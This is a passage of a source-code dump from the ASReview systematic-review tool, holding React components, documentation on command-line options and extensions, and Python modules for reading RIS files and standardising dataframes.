vertical: \"bottom\",\n horizontal: \"right\",\n };\n\n return (\n <Root>\n <Snackbar\n anchorOrigin={anchorOrigin}\n open={props.state.open}\n autoHideDuration={decisionUndoBarDuration}\n onClose={handleClose}\n message={props.state.message}\n action={\n <div>\n <Button\n disabled={props.disableButton()}\n size=\"small\"\n onClick={handleUndo}\n sx={{\n color: (theme) =>\n theme.palette.mode === \"light\"\n ? \"primary.light\"\n : \"primary.dark\",\n }}\n >\n UNDO\n </Button>\n </div>\n }\n className={classes.snackbar}\n />\n </Root>\n );\n};\n\nexport default DecisionUndoBar;\n" }, { "alpha_fraction": 0.7038189768791199, "alphanum_fraction": 0.7086279988288879, "avg_line_length": 22.403972625732422, "blob_id": "8ec998b6817a93cdd5d50c42b44a1f5c1293f318", "content_id": "ca3e1578c31d9c883a234179aae15fe2250a27ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3535, "license_type": "permissive", "max_line_length": 103, "num_lines": 151, "path": "/docs/source/start.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Start ASReview LAB\n==================\n\nAfter you install ASReview LAB, start the program via the command line to\nstart using it.\n\n.. code:: bash\n\n\tasreview lab\n\nWhen you are using Windows, open `CMD.exe` and run the command. When you use\nMacOS or Linux, you can open `Terminal` and run the command.\n\nThe information in the sections below is more advanced and not needed for the\nmajority of the ASReview LAB users.\n\nCommand line arguments for starting ASReview LAB\n------------------------------------------------\n\nASReview LAB provides a powerful command line interface for running ASReview\nLAB with other options or even run tasks like simulations. For a list of\navailable commands in ASReview LAB, type :code:`asreview lab --help`.\n\n:program:`asreview lab` launches the ASReview LAB software (the frontend).\n\n.. code:: bash\n\n asreview lab [options]\n\n\n\n.. program:: asreview lab\n\n.. option:: -h, --help\n\n\tShow help message and exit.\n\n.. option:: --ip IP\n\n The IP address the server will listen on.\n\n.. option:: --port PORT\n\n\tThe port the server will listen on.\n\n.. option:: --port-retries NUMBER_RETRIES\n\n\tThe number of additional ports to try if the specified port is not\n available.\n\n.. option:: --enable-auth ENABLE_AUTH\n\n\tEnable authentication.\n\n.. option:: --secret-key SECRET_KEY\n\n\tSecret key for authentication.\n\n.. option:: --salt SALT\n\n\tWhen using authentication, a salt code is needed for hasing passwords.\n\n.. option:: --flask-configfile FLASK_CONFIGFILE\n\n Full path to a JSON file containing Flask parameters for authentication.\n\n.. option:: --no-browser NO_BROWSER\n\n\tDo not open ASReview LAB in a browser after startup.\n\n.. option:: --certfile CERTFILE_FULL_PATH\n\n The full path to an SSL/TLS certificate file.\n\n.. option:: --keyfile KEYFILE_FULL_PATH\n\n The full path to a private key file for usage with SSL/TLS.\n\n.. option:: --embedding EMBEDDING_FP\n\n File path of embedding matrix. Required for LSTM models.\n\n.. option:: --clean-project CLEAN_PROJECT\n\n Safe cleanup of temporary files in project.\n\n.. option:: --clean-all-projects CLEAN_ALL_PROJECTS\n\n Safe cleanup of temporary files in all projects.\n\n.. option:: --seed SEED\n\n\tSeed for the model (classifiers, balance strategies, feature extraction\n\ttechniques, and query strategies). Use an integer between 0 and 2^32 - 1.\n\n\nSet environment variables\n-------------------------\n\nThe following environment variables are available.\n\n.. option:: ASREVIEW_PATH\n\n\tThe path to the folder with project. Default `~/.asreview`.\n\n\nHow you set environment variables depends on the operating system and the\nenvironment in which you deploy ASReview LAB.\n\nIn MacOS or Linux operating systems, you can set environment variables from the command\nline. For example:\n\n.. code:: bash\n\n export ASREVIEW_PATH=~/.asreview\n\nOn Windows, you can use the following syntax:\n\n.. code:: bash\n\n\tset ASREVIEW_PATH=~/.asreview\n\nTo check if you set an environment variable successfully, run the following on \\*nix operating systems:\n\n.. code:: bash\n\n\techo $ASREVIEW_PATH\n\nOr the following on Windows operating systems:\n\n.. code:: bash\n\n\techo %ASREVIEW_PATH%\n\n\nRun ASReview LAB on localhost with a different port\n---------------------------------------------------\n\nBy default, ASReview LAB runs on port 5000. If that port is already in use or\nif you want to specify a different port, start ASReview LAB with the following\ncommand:\n\n.. code:: bash\n\n\tasreview lab --port <port>\n\nFor example, start ASReview LAB on port 5001:\n\n.. code:: bash\n\n\tasreview lab --port 5001\n\n" }, { "alpha_fraction": 0.5364744067192078, "alphanum_fraction": 0.5413485169410706, "avg_line_length": 34.37356185913086, "blob_id": "05b8b2b03666a41252f5bd3360433fb4c4b08fd3", "content_id": "2d6c043ed67d52f63684453c28e96c42fef81ef9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6155, "license_type": "permissive", "max_line_length": 87, "num_lines": 174, "path": "/asreview/io/ris_reader.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport io\nimport logging\nimport re\nfrom urllib.request import urlopen\n\nimport pandas\nimport rispy\n\nfrom asreview.io.utils import _standardize_dataframe\nfrom asreview.utils import is_url\n\n\nclass RISReader:\n \"\"\"RIS file reader.\"\"\"\n\n read_format = [\".ris\", \".txt\"]\n write_format = [\".csv\", \".tsv\", \".xlsx\", \".ris\"]\n\n def _strip_zotero_p_tags(note_list):\n \"\"\"Converter function for removing the XHTML <p></p> tags from Zotero export.\n\n Arguments\n ---------\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n new_notes: list\n A list of updated notes, where XHTML <p></p> tags have been stripped.\n note_list: list\n The original note_list, when no XHTML <p></p> tags have been found.\n \"\"\"\n if isinstance(note_list, list):\n new_notes = []\n for v in note_list:\n try:\n new_notes.append(re.sub(r\"^<p>|<\\/p>$\", \"\", v))\n except Exception:\n new_notes.append(v)\n return new_notes\n else:\n return note_list\n\n def _label_parser(note_list):\n \"\"\"Parse \"included\" and \"notes\" columns.\n\n Arguments\n ---------\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n asreview_new_notes: list\n A list of updated notes, where internal label has been added.\n note_list: list\n The original note_list, when no labels have been found.\n 1,0,-1: int\n Labels in case they are still needed from the internal representation.\n \"\"\"\n regex = r\"ASReview_relevant|ASReview_irrelevant|ASReview_not_seen\"\n\n # Check whether note_list is actually a list and not NaN\n # Return -1 and an empty list\n if not isinstance(note_list, list):\n return -1, []\n\n # Create lists of lists for ASReview references\n asreview_refs = [re.findall(regex, note) for note in note_list]\n asreview_refs_list = [item for sublist in asreview_refs for item in sublist]\n\n if len(asreview_refs_list) > 0:\n # Create lists of lists for notes without references\n asreview_new_notes = [re.sub(regex, \"\", note) for note in note_list]\n # Remove empty elements from list\n asreview_new_notes[:] = [item for item in asreview_new_notes if item != \"\"]\n label = asreview_refs_list[-1]\n\n # Check for the label and return proper values for internal representation\n if label == \"ASReview_relevant\":\n return 1, asreview_new_notes\n elif label == \"ASReview_irrelevant\":\n return 0, asreview_new_notes\n elif label == \"ASReview_not_seen\":\n return -1, asreview_new_notes\n else:\n return -1, note_list\n\n @classmethod\n def read_data(cls, fp):\n \"\"\"Import dataset.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n File path to the RIS file.\n note_list: list\n A list of notes, coming from the Dataframe's \"notes\" column.\n\n Returns\n -------\n pandas.DataFrame:\n Dataframe with entries.\n\n Raises\n ------\n ValueError\n File with unrecognized encoding is used as input.\n \"\"\"\n encodings = [\"utf-8\", \"utf-8-sig\", \"ISO-8859-1\"]\n entries = None\n if entries is None:\n if is_url(fp):\n url_input = urlopen(fp)\n for encoding in encodings:\n if is_url(fp):\n try:\n bibliography_file = io.StringIO(\n url_input.read().decode(encoding)\n )\n\n entries = list(\n rispy.load(bibliography_file, skip_unknown_tags=True)\n )\n bibliography_file.close()\n break\n except UnicodeDecodeError:\n pass\n else:\n try:\n with open(fp, \"r\", encoding=encoding) as bibliography_file:\n entries = list(\n rispy.load(bibliography_file, skip_unknown_tags=True)\n )\n break\n except UnicodeDecodeError:\n pass\n except IOError as e:\n logging.warning(e)\n if entries is None:\n raise ValueError(\"Cannot find proper encoding for data file.\")\n\n # Turn the entries dictionary into a Pandas dataframe\n df = pandas.DataFrame(entries)\n\n # Check if \"notes\" column is present\n if \"notes\" in df:\n # Strip Zotero XHTML <p> tags on \"notes\"\n df[\"notes\"] = df[\"notes\"].apply(cls._strip_zotero_p_tags)\n # Split \"included\" from \"notes\"\n df[[\"included\", \"notes\"]] = pandas.DataFrame(\n df[\"notes\"].apply(cls._label_parser).tolist(),\n columns=[\"included\", \"notes\"],\n )\n # Return the standardised dataframe with label and notes separated\n return _standardize_dataframe(df)\n else:\n # Return the standardised dataframe\n return _standardize_dataframe(df)\n" }, { "alpha_fraction": 0.6854776740074158, "alphanum_fraction": 0.6862444281578064, "avg_line_length": 32.270408630371094, "blob_id": "21e049a661a343e7420602c07c580e2d035d31bf", "content_id": "07637d8e3a72223b43f016f1b9dc6afa3f8ee923", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6843, "license_type": "permissive", "max_line_length": 91, "num_lines": 196, "path": "/docs/source/extensions_dev.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": ".. _develop-extensions:\n\nCreate extensions\n=================\n\nASReview extensions enable you to integrate your programs with the ASReview\nframework seamlessly, by using the Python API. These extensions fall into three\ndifferent categories, and interact with the API in different ways.\n\n1. `Model extensions`_\n2. `Subcommand extensions`_\n3. `Dataset extensions`_\n\nThe extensibility of the framework is provided by the entrypoints of\nsetuptools. You will need to create a package and install it (for example with\npip).\n\nDid you develop a useful extension to ASReview and want to list it on\n:ref:`extensions-community`? Create a Pull Request or open an issue on\n`GitHub <https://github.com/asreview/asreview/issues>`__.\n\nFor more information on the ASReview API for creating an extension, a technical\nreference for development is found under the :ref:`API reference<api_ref>`. This\ntechnical reference contains functions for use in your extension, and an\noverview of all classes to extend on.\n\n\nModel Extensions\n----------------\nAn extension of a :class:`asreview.models.base.BaseModel` type class.\n\nModel extensions extent the ASReview software with new classifiers, query\nstrategies, balance strategies, or feature extraction techniques. These\nextensions extend one of the model base classes\n(:class:`asreview.models.balance.base`,\n:class:`asreview.models.classifiers.base`,\n:class:`asreview.models.feature_extraction.base`,\n:class:`asreview.models.query.base`).\n\nThe easiest way to extend ASReview with a model is by using the |template_link|.\nCreate a copy of the template and add the new algorithm to a new model file. It\nis advised to use the following structure of the package:\n\n.. code:: bash\n\n ├── README.md\n ├── asreviewcontrib\n │   └── models\n │   ├── classifiers\n │      │ ├── __init__.py\n │      │ └── example_model.py\n │      ├── feature_extraction\n │      │ ├── __init__.py\n │      │ └── example_feature_extraction.py\n │      ├── balance\n │      │ ├── __init__.py\n │      │ └── example_balance_strategies.py\n │      └── query\n │      ├── __init__.py\n │      └── example_query_strategies.py\n ├── setup.py\n └── tests\n\nThe next step is to add metadata to the `setup.py\n<https://github.com/asreview/template-extension-new-model/blob/main/setup.py>`__\nfile. Edit the ``name`` of the package and point the ``entry_points`` to the\nmodels.\n\n.. code:: bash\n\n entry_points={\n 'asreview.models.classifiers': [\n 'example = asreviewcontrib.models.classifiers.example_model:ExampleClassifier',\n ],\n 'asreview.models.feature_extraction': [\n # define feature_extraction algorithms\n ],\n 'asreview.models.balance': [\n # define balance_strategy algorithms\n ],\n 'asreview.models.query': [\n # define query_strategy algorithms\n ]\n },\n\nThis code registers the model with name ``example``.\n\n.. |template_link| raw:: html\n\n <a href=\"https://github.com/asreview/template-extension-new-model\"\n target=\"_blank\"> template for extending ASReview</a>\n\nSubcommand Extensions\n---------------------\nAn extension of the :class:`asreview.entry_points.base.BaseEntryPoint` class.\n\nSubcommand extensions are programs that create a new entry point for ASReview.\nFrom this entry point the Python API can be used in many ways (like ``plot`` or\n``simulate``).\n\nExtensions in ASReview are Python packages and can extend the subcommands of\nasreview (see ``asreview -h``). An example of a subcommand extension is\n`ASReview Insights <https://github.com/asreview/asreview-insights>`_.\n\nThe easiest way to create a new subcommand is by defining a class that can be\nused as a new entry point for ASReview. This class should inherit from\n:class:`asreview.entry_points.base.BaseEntryPoint`. Add the functionality to the\nclass method ``execute``.\n\n.. code:: python\n\n from asreview.entry_points import BaseEntryPoint\n\n class ExampleEntryPoint(BaseEntryPoint):\n\n description = \"Description of example extension\"\n extension_name = \"asreview-example\" # Name of the extension\n version = \"1.0\" # Version of the extension in x.y(.z) format.\n\n def execute(self, argv):\n pass # Implement your functionality here.\n\nIt is strongly recommended to define the attributes ``description``,\n``extension_name``, and ``version``.\n\nThe class method ``execute`` accepts a positional argument (``argv`` in this\nexample). First create the functionality you would like to be able to use in\nany directory. The argument ``argv`` are the command line arguments left after\nremoving asreview and the entry point.\n\nIt is advised to place the newly defined class ``ExampleEntryPoints`` in the\nfollowing package structure:\n``asreviewcontrib.{extension_name}.{your_modules}``. For example:\n\n.. code:: bash\n\n ├── README.md\n ├── asreviewcontrib\n │   └── example\n │   ├── __init__.py\n │   ├── entrypoint.py\n │   └── example_utils.py\n ├── setup.py\n └── tests\n\n\nCreate a ``setup.py`` in\nthe root of the package, and set the keyword argument `entry_points` of\n``setup()`` under ``asreview.entry_points``, for example:\n\n.. code:: python\n\n entry_points={\n \"asreview.entry_points\": [\n \"example = asreviewcontrib.example.entrypoint:ExampleEntryPoint\",\n ]\n }\n\nAfter installing this package, ASReview is extended with the ``asreview\nexample`` subcommand. See ``asreview -h`` for this option.\n\n\nDataset Extensions\n------------------\nAn extension of the :class:`asreview.datasets.BaseDataSet` class.\n\nDataset extensions integrate new datasets for use in ASReview. Adding datasets\nvia extension provides quick access to the dataset via Command Line Interface or in\nASReview LAB.\n\nIt is advised to place the new dataset ``your_dataset`` in the\nfollowing package structure:\n\n.. code:: bash\n\n ├── README.md\n ├── asreviewcontrib\n │   └── dataset_name\n │   ├── __init__.py\n │   └── your_dataset.py\n ├── data\n │   └── your_dataset.csv\n ├── setup.py\n └── tests\n\nFor minimal functionality, ``your_dataset.py`` should extent\n:class:`asreview.datasets.BaseDataSet` and\n:class:`asreview.datasets.BaseDataGroup`.\n\nA working template to clone and use can be found at `Template for extending\nASReview with a new dataset\n<https://github.com/asreview/template-extension-new-dataset>`_.\n\n\nFurther functionality can be\nextensions of any other class in :mod:`asreview.datasets`.\n" }, { "alpha_fraction": 0.5002501010894775, "alphanum_fraction": 0.5042521357536316, "avg_line_length": 21.97701072692871, "blob_id": "495515110c42f124908675f51dfa957fb74d4d9b", "content_id": "21cdad47e640bf15f5e632b015035f21b9679d86", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1999, "license_type": "permissive", "max_line_length": 91, "num_lines": 87, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/NoteSheet.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {\n Box,\n Card,\n CardContent,\n IconButton,\n Stack,\n TextField,\n Tooltip,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { KeyboardArrowDown } from \"@mui/icons-material\";\n\nconst PREFIX = \"NoteSheet\";\n\nconst classes = {\n textfield: `${PREFIX}-text-field`,\n button: `${PREFIX}-button`,\n};\n\nconst Root = styled(\"div\")({\n [`& .${classes.textfield}`]: {\n paddingLeft: 16,\n paddingRight: 16,\n },\n [`& .${classes.button}`]: {\n display: \"flex\",\n justifyContent: \"flex-end\",\n paddingRight: 16,\n },\n});\n\nconst NoteSheet = (props) => {\n const handleNote = (event) => {\n props.setRecordNote((s) => {\n return {\n ...s,\n data: event.target.value,\n };\n });\n };\n\n const handleClickCollapseNote = () => {\n props.setRecordNote((s) => {\n return {\n ...s,\n expand: false,\n };\n });\n };\n\n return (\n <Root>\n <Card variant=\"outlined\">\n <CardContent>\n <Stack spacing={1}>\n <Box className={classes.button}>\n <Tooltip title=\"Collapse\">\n <IconButton onClick={handleClickCollapseNote}>\n <KeyboardArrowDown />\n </IconButton>\n </Tooltip>\n </Box>\n <Box className={classes.textfield}>\n <TextField\n autoComplete=\"off\"\n id=\"multiline-note\"\n label=\"Note\"\n autoFocus={props.noteFieldAutoFocus()}\n fullWidth\n helperText=\"Save the note by labeling the record as relevant or irrelevant\"\n multiline\n onChange={handleNote}\n placeholder=\"Write something...\"\n rows={4}\n value={props.note ? props.note : \"\"}\n variant=\"outlined\"\n />\n </Box>\n </Stack>\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default NoteSheet;\n" }, { "alpha_fraction": 0.6193403005599976, "alphanum_fraction": 0.6214392781257629, "avg_line_length": 28.910314559936523, "blob_id": "1f3260243be809c8d9fb10202892eb59052e551f", "content_id": "f7dcec431cbe920312939d941b4cea68768d226f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6670, "license_type": "permissive", "max_line_length": 86, "num_lines": 223, "path": "/asreview/io/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.config import LABEL_NA\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.utils import _entry_points\n\n\ndef type_from_column(col_name, col_definitions):\n \"\"\"Transform a column name to its standardized form.\n\n Arguments\n ---------\n col_name: str\n Name of the column in the dataframe.\n col_definitions: dict\n Dictionary of {standardized_name: [list of possible names]}.\n Ex. {\"title\": [\"title\", \"primary_title\"],\n \"authors\": [\"authors\", \"author names\", \"first_authors\"]}\n\n Returns\n -------\n str:\n The standardized name. If it wasn't found, return None.\n \"\"\"\n for name, definition in col_definitions.items():\n if col_name.lower() in definition:\n return name\n return None\n\n\ndef convert_keywords(keywords):\n \"\"\"Split keywords separated by commas etc to lists.\"\"\"\n if not isinstance(keywords, str):\n return keywords\n\n current_best = [keywords]\n for splitter in [\", \", \"; \", \": \", \";\", \":\"]:\n new_split = keywords.split(splitter)\n if len(new_split) > len(current_best):\n current_best = new_split\n return current_best\n\n\ndef _is_record_id_unique(s):\n if len(pd.unique(s)) != len(s.index):\n raise ValueError(\"Column 'record_id' contains duplicate values.\")\n\n\ndef _is_record_id_notnull(s):\n if s.isnull().any():\n raise ValueError(\"Column 'record_id' contains missing values.\")\n\n\ndef _is_record_id_int(s):\n try:\n pd.to_numeric(s).astype(int)\n except Exception:\n raise ValueError(\"Column 'record_id' should contain integer values.\")\n\n\ndef _standardize_dataframe(df, column_def={}):\n \"\"\"Create a ASReview readable dataframe.\n\n The main purpose is to rename columns with slightly different names;\n 'authors' vs 'first_authors', etc. This greatly widens the compatibility\n with different datasets.\n\n Arguments\n ---------\n df: pandas.DataFrame\n Unclean dataframe to be cleaned up.\n\n Returns\n -------\n pd.DataFrame:\n Cleaned dataframe with proper column names.\n \"\"\"\n all_column_spec = {}\n\n # remove whitespace from colnames\n df.columns = df.columns.str.strip()\n\n # map columns on column specification\n col_names = list(df)\n for column_name in col_names:\n # First try the custom column definitions if supplied.\n data_type = type_from_column(column_name, column_def)\n if data_type is not None:\n all_column_spec[data_type] = column_name\n continue\n # Then try the standard specifications in ASReview.\n data_type = type_from_column(column_name, COLUMN_DEFINITIONS)\n if data_type is not None:\n all_column_spec[data_type] = column_name\n\n # Check if we either have abstracts or titles.\n col_names = list(all_column_spec)\n if \"abstract\" not in col_names and \"title\" not in col_names:\n raise BadFileFormatError(\n \"File supplied without 'abstract' or 'title'\" \" fields.\"\n )\n if \"abstract\" not in col_names:\n logging.warning(\"Unable to detect abstracts in dataset.\")\n if \"title\" not in col_names:\n logging.warning(\"Unable to detect titles in dataset.\")\n\n # Replace NA values with empty strings.\n for col in [\"title\", \"abstract\", \"authors\", \"keywords\", \"notes\"]:\n try:\n df[all_column_spec[col]] = np.where(\n pd.isnull(df[all_column_spec[col]]),\n \"\",\n df[all_column_spec[col]].astype(str),\n )\n except KeyError:\n pass\n\n # Convert labels to integers.\n if \"included\" in col_names:\n try:\n col = all_column_spec[\"included\"]\n df[col].fillna(LABEL_NA, inplace=True)\n df[col] = pd.to_numeric(df[col])\n except KeyError:\n pass\n except ValueError:\n logging.warning(\n \"Failed to parse label column name, no labels will\" \" be present.\"\n )\n df.rename(columns={\"label\": \"included\"})\n all_column_spec.pop(\"included\")\n\n # TODO: Make sure 'record_id' column in original dataset does not get overwritten.\n # # If the we have a record_id (for example from an ASReview export) use it.\n # if \"record_id\" in list(df):\n #\n # # validate record_id column\n # _is_record_id_notnull(df[\"record_id\"])\n # _is_record_id_unique(df[\"record_id\"])\n # _is_record_id_int(df[\"record_id\"])\n #\n # # Create a new index if we haven't found it in the data.\n # else:\n # df[\"record_id\"] = np.arange(len(df.index))\n df[\"record_id\"] = np.arange(len(df.index)).astype('int64')\n\n # set the index\n df.set_index(\"record_id\", inplace=True)\n\n return df, all_column_spec\n\n\ndef list_readers():\n \"\"\"List available dataset reader classes.\n\n Returns\n -------\n list:\n Classes of available dataset readers in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.readers\")]\n\n\ndef list_writers():\n \"\"\"List available dataset writer classes.\n\n Returns\n -------\n list:\n Classes of available dataset writers in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.writers\")]\n\n\ndef get_reader_class(name):\n \"\"\"Get class of dataset reader from string.\n\n Arguments\n ---------\n name: str\n Name of the dataset reader, e.g. '.csv', '.tsv' or '.xlsx'.\n\n Returns\n -------\n class:\n Class corresponding to the name.\n \"\"\"\n return _entry_points(group=\"asreview.readers\")[name].load()\n\n\ndef get_writer_class(name):\n \"\"\"Get class of dataset writer from string.\n\n Arguments\n ---------\n name: str\n Name of the dataset writer, e.g. '.csv', '.tsv' or '.xlsx'.\n\n Returns\n -------\n class:\n Class corresponding to the name.\n \"\"\"\n\n return _entry_points(group=\"asreview.writers\")[name].load()\n" }, { "alpha_fraction": 0.580632209777832, "alphanum_fraction": 0.5834449529647827, "avg_line_length": 29.349594116210938, "blob_id": "0f25adcda46fa4847d3210a59272901bf00c758e", "content_id": "94eb7f37ccd774e7201a928c94f9a8725e7dd78f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7466, "license_type": "permissive", "max_line_length": 80, "num_lines": 246, "path": "/asreview/webapp/src/App.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { QueryClient, QueryClientProvider } from \"react-query\";\nimport { useSelector, useDispatch } from \"react-redux\";\nimport { Routes, Route } from \"react-router-dom\";\nimport \"typeface-roboto\";\nimport { Box, CssBaseline, createTheme, useMediaQuery } from \"@mui/material\";\nimport CircularProgress from \"@mui/material/CircularProgress\";\nimport { ThemeProvider, StyledEngineProvider } from \"@mui/material/styles\";\nimport \"./App.css\";\n\nimport { BaseAPI } from \"./api/index.js\";\nimport { setBootData, setOAuthServices } from \"./redux/actions\";\n\nimport {\n ConfirmAccount,\n ForgotPassword,\n HelpDialog,\n NavigationDrawer,\n RequireAuth,\n PersistSignIn,\n ResetPassword,\n SettingsDialog,\n SignIn,\n SignInOAuthCallback,\n SignUpForm,\n} from \"./Components\";\nimport { HomePage } from \"./HomeComponents\";\nimport { ProjectPage } from \"./ProjectComponents\";\nimport {\n useDarkMode,\n useFontSize,\n useKeyPressEnabled,\n useUndoEnabled,\n} from \"./hooks/SettingsHooks\";\nimport { useToggle } from \"./hooks/useToggle\";\n\n// Ensure that on localhost we use 'localhost' instead of '127.0.0.1'\nconst currentDomain = window.location.href;\nif (currentDomain.includes(\"127.0.0.1\")) {\n let newDomain = currentDomain.replace(\"127.0.0.1\", \"localhost\");\n window.location.replace(newDomain);\n}\n\nconst queryClient = new QueryClient();\n\nconst App = (props) => {\n // state related stuff for booting the app\n const [appReady, setAppReadyState] = React.useState(false);\n const dispatch = useDispatch();\n const authentication = useSelector((state) => state.authentication);\n const allowAccountCreation = useSelector(\n (state) => state.allow_account_creation,\n );\n const emailVerification = useSelector((state) => state.email_verification);\n\n // Dialog state\n const [onSettings, toggleSettings] = useToggle();\n const [onProjectSetup, toggleProjectSetup] = useToggle();\n const [projectCheck, setProjectCheck] = React.useState({\n open: false,\n issue: null,\n path: \"/projects\",\n project_id: null,\n });\n\n // Settings hook\n const [theme, toggleDarkMode] = useDarkMode();\n const [fontSize, handleFontSizeChange] = useFontSize();\n const [undoEnabled, toggleUndoEnabled] = useUndoEnabled();\n const [keyPressEnabled, toggleKeyPressEnabled] = useKeyPressEnabled();\n\n const muiTheme = createTheme(theme);\n const mobileScreen = useMediaQuery(muiTheme.breakpoints.down(\"md\"), {\n noSsr: true,\n });\n\n // Navigation drawer state\n const [onNavDrawer, toggleNavDrawer] = useToggle(mobileScreen ? false : true);\n\n // This effect does a boot request to gather information\n // from the backend\n React.useEffect(() => {\n BaseAPI.boot({})\n .then((response) => {\n dispatch(setBootData(response));\n // set oauth services if there are any\n if (response?.oauth) {\n dispatch(setOAuthServices(response.oauth));\n }\n })\n .catch((err) => {\n console.log(err);\n });\n }, [dispatch]);\n\n // This effect makes sure we handle routing at the\n // moment we know for sure if there is, or isn't authentication.\n React.useEffect(() => {\n if (\n authentication !== undefined &&\n allowAccountCreation !== undefined &&\n emailVerification !== undefined\n ) {\n setAppReadyState(true);\n } else {\n setAppReadyState(false);\n }\n }, [authentication, allowAccountCreation, emailVerification]);\n\n const render_sign_routes = () => {\n return (\n <>\n {allowAccountCreation && (\n <Route\n path=\"/signup\"\n element={<SignUpForm mobileScreen={mobileScreen} />}\n />\n )}\n <Route\n path=\"/signin\"\n element={<SignIn mobileScreen={mobileScreen} />}\n />\n <Route\n path=\"/oauth_callback\"\n element={<SignInOAuthCallback mobileScreen={mobileScreen} />}\n />\n <Route\n path=\"/forgot_password\"\n element={<ForgotPassword mobileScreen={mobileScreen} />}\n />\n <Route path=\"/confirm_account\" element={<ConfirmAccount />} />\n <Route\n path=\"/reset_password\"\n element={<ResetPassword mobileScreen={mobileScreen} />}\n />\n {emailVerification && (\n <Route\n path=\"/confirm_account\"\n element={<SignUpForm mobileScreen={mobileScreen} />}\n />\n )}\n </>\n );\n };\n\n const render_routes = () => {\n return (\n <>\n {/* Public or Private routes, depending on authentication */}\n <Route\n path=\"*\"\n element={\n <RequireAuth enforce_authentication={authentication}>\n <NavigationDrawer\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n toggleNavDrawer={toggleNavDrawer}\n toggleSettings={toggleSettings}\n />\n </RequireAuth>\n }\n >\n <Route\n path=\"*\"\n element={\n <HomePage\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n onProjectSetup={onProjectSetup}\n projectCheck={projectCheck}\n setProjectCheck={setProjectCheck}\n toggleProjectSetup={toggleProjectSetup}\n />\n }\n />\n <Route\n path=\"projects/:project_id/*\"\n element={\n <ProjectPage\n mobileScreen={mobileScreen}\n onNavDrawer={onNavDrawer}\n fontSize={fontSize}\n undoEnabled={undoEnabled}\n keyPressEnabled={keyPressEnabled}\n projectCheck={projectCheck}\n setProjectCheck={setProjectCheck}\n toggleProjectSetup={toggleProjectSetup}\n />\n }\n />\n </Route>\n </>\n );\n };\n\n return (\n <QueryClientProvider client={queryClient}>\n <StyledEngineProvider injectFirst>\n <ThemeProvider theme={muiTheme}>\n <CssBaseline />\n\n <div aria-label=\"nav and main content\">\n {appReady === false && (\n <Box\n display=\"flex\"\n justifyContent=\"center\"\n alignItems=\"center\"\n minHeight=\"100vh\"\n >\n <CircularProgress />\n </Box>\n )}\n {appReady === true && authentication === false && (\n <Routes>{render_routes()}</Routes>\n )}\n\n {appReady === true && authentication === true && (\n <Routes>\n {render_sign_routes()}\n <Route element={<PersistSignIn />}>{render_routes()}</Route>\n </Routes>\n )}\n </div>\n\n {/* Dialogs */}\n <SettingsDialog\n mobileScreen={mobileScreen}\n onSettings={onSettings}\n onDark={theme}\n fontSize={fontSize}\n keyPressEnabled={keyPressEnabled}\n undoEnabled={undoEnabled}\n toggleSettings={toggleSettings}\n toggleDarkMode={toggleDarkMode}\n handleFontSizeChange={handleFontSizeChange}\n toggleKeyPressEnabled={toggleKeyPressEnabled}\n toggleUndoEnabled={toggleUndoEnabled}\n />\n <HelpDialog mobileScreen={mobileScreen} />\n </ThemeProvider>\n </StyledEngineProvider>\n </QueryClientProvider>\n );\n};\n\nexport default App;\n" }, { "alpha_fraction": 0.5752878785133362, "alphanum_fraction": 0.5760850310325623, "avg_line_length": 34.391849517822266, "blob_id": "7bcd6abb65aa92b19306e87594d5376df6fbdc98", "content_id": "82927403926ffa82557bf60ed9e27d9024872a0e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11290, "license_type": "permissive", "max_line_length": 88, "num_lines": 319, "path": "/asreview/review/base.py", "repo_name": "terrymyc/asreview", 